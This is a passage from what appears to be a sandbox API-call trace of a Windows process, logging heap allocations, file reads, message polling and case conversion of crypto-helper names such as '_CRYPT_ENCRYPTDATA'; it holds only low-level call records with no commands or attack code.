lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0122.370] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x56b0, lpOverlapped=0x0) returned 1 [0122.371] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x156b0) returned 0x49aa010 [0122.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0122.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x156b0) returned 0x49bf6c8 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x156b0) returned 0x49aa010 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.376] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0122.376] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x156b0) returned 0x49aa010 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x156b0) returned 0x49d4d80 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0122.378] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0122.378] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0122.379] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0122.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0122.379] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.380] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.381] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0122.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.381] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0122.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0122.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.384] 